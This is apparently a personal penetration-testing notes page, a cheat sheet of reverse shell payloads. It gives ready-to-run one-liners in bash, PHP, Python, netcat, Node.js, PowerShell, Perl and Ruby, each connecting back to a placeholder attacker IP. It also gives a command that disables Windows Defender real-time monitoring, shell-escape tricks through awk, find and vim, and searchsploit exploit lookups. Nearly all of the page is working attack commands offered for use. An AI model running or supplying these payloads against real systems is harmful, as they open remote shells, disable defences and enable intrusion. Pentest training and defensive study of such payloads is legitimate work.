View on GitHub

Shells and Payloads

Introduction

There are many different ways to "pop" a reverse shell. Check out the different paylads provided in my notes, but keep in mind that there are many different resources online

Useful Resources

Bash Reverse Shells

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

bash -c "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"

0<&196;exec 196<>/dev/tcp/192.168.1.101/80; sh <&196 >&196 2>&196

PHP Reverse Shells

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?>

https://github.com/flast101/reverse-shell-cheatsheet/blob/master/php-reverse-shell.php

Python Reverse Shells

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

__import__("os").system("bash -c 'bash -i >& /dev/tcp/10.0.0.10/666 0>&1'")

Python TTY: python -c 'import pty; pty.spawn("/bin/sh")'

Netcat Reverse Shells

nc 192.168.1.101 5555 -e /bin/bash

rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Node.js Reverse Shells

require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');

JSShell: https://github.com/shelld3v/JSshell

Powershell Payloads

Reverse Shell: powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 \| Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Disable real time monitoring in Windows Defender: Set-MpPreference -DisableRealtimeMonitoring $true

Perl Reverse Shells

perl -e 'exec "/bin/sh";'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby Reverse Shells

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Linux Payloads

Spawn interactive shell: awk 'BEGIN {system("/bin/sh")}' 
Spawn interactive shell: find / -name nameoffile 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
Spawn interactive shell: find . -exec /bin/sh \; -quit 
Spawn interactive shell: vim -c ':!/bin/sh'

Searchsploit

  • Install & update: sudo apt update && sudo apt install exploitdb

  • You can serach for exploits using tags such as: searchsploit remote smb microsoft window

  • Copy a script to the current directory: searchsploit -m windows/remote/48537.py

Msfconsole & Msfvenom

Kali Linux Web Shells

You can find some web shells within Kali Linux, under /usr/share/webshells

Last updated